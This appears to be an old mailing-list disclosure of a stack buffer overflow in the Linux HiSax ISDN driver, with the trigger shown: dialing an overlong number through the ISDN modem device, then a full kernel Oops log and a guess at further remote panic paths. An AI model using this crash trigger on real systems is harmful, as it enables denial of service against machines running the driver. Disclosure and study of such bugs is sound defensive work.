linux/drivers/isdn/hisax/l3dss1.c l3dss1_setup_req() uses a 128 byte
buffer on the stack to build a ISDN message. This buffer is being filled
with the construct *p++ without boundary checks. Besides other things
user specified telephone numbers are copied into that buffer, so
exploiting this is trivial:
<Install DSS1 line, teles card and hisax kernel module ...>
[root@elvis /root]# tail -f /var/log/messages &
<... blurb removed ...>
[root@elvis /root]# seyon -modem /dev/ttyI0 -noemulator
Seyon Copyright (c) 1992-1993 Muhammad M. Saggaf. All rights reserved.
Version 2.1 rev. 4b i586-Linux ewt@porky.redhat.com 11/20/96 18:40:51.
Locating Modems...
>> Error: Could not get linux serial info: Invalid argument.
>> Warning: invalid default BPS value: 9600.
Modem ``/dev/ttyI0'' is Available.
at&e0
OK
atd999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999Aug 12 19:33:46 elvis kernel: Unable to handle kernel paging request at virtual address f9393939
<... Rest of OOPS removed ...>
Voila, InstantOops (TM). For your convenciance the full Oops massage
is appended below. Since the *foo++ = bar; method is used at several
places in the HiSax driver there seem to be a lot more of these
overflows.
For example, I think sending a ISDN Message that produces more than 4k
debug log might be a convenient way to panic any Linux box connected
to DSS.1 using the HiSax driver. I didn't verify this, though.
Froh
P.S.:
Aug 12 19:33:46 elvis kernel: Unable to handle kernel paging request at virtual address f9393939
Aug 12 19:33:46 elvis kernel: current->tss.cr3 = 0086b000, (r3 = 0086b000
Aug 12 19:33:46 elvis kernel: *pde = 00000000
Aug 12 19:33:46 elvis kernel: Oops: 0000
Aug 12 19:33:46 elvis kernel: CPU: 0
Aug 12 19:33:46 elvis kernel: EIP: 0010:[vsprintf+763/1232]
Aug 12 19:33:46 elvis kernel: EFLAGS: 00010097
Aug 12 19:33:46 elvis kernel: eax: 39393939 ebx: ffffffff ecx: 39393939 edx: fffffffe
Aug 12 19:33:46 elvis kernel: esi: ffffffff edi: 00f21e28 ebp: 00000000 esp: 00f21da0
Aug 12 19:33:46 elvis kernel: ds: 0018 es: 0018 fs: 002b gs: 002b ss: 0018
Aug 12 19:33:46 elvis kernel: Process seyon (pid: 26709, process nr: 51, stackpage=00f21000)
Aug 12 19:33:46 elvis kernel: Stack: 00000000 39393939 00f21e28 00021094 0002114c 00021094 00f21e94 ffffffff
Aug 12 19:33:46 elvis kernel: 0000001b 0188af87 00186d64 00f21e28 0188abbe 00f21de8 0188228e 00f21e28
Aug 12 19:33:46 elvis kernel: 0188abbd 39393939 00f21e1c 00f21e1c 00f21e1c 0002114c 00021094 00f21f95
Aug 12 19:33:47 elvis kernel: Call Trace: [<0188af87>] [sprintf+20/24] [<0188abbe>] [<0188228e>] [<0188abbd>] [system_call+82/128]
Aug 12 19:33:47 elvis kernel: Code: 80 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 89 c6 f7 c5 10 00
-- Frohwalt EgererThe only thing scarier than a sysadmin with a screwdriver is a programmer with the root password. -- Steve Barnet